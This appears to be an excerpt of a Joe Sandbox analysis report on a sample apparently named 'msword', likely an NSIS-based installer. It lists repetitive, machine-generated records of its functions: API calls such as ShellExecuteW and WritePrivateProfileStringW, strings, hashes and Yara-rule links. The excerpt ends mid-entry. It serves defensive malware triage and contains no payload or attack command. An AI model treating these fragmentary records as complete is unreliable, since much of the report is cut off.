Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: 229$Exch: stack < %d elements$Pop: stack empty
API String ID: 1459762280-2572911037
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
229, xrefs: 00402770

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: 229$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-2725386541
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004283D1,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004283D1,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

N, xrefs: 00404C32
M, xrefs: 00404B6F
@, xrefs: 00404BBC
, xrefs: 00404F65

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

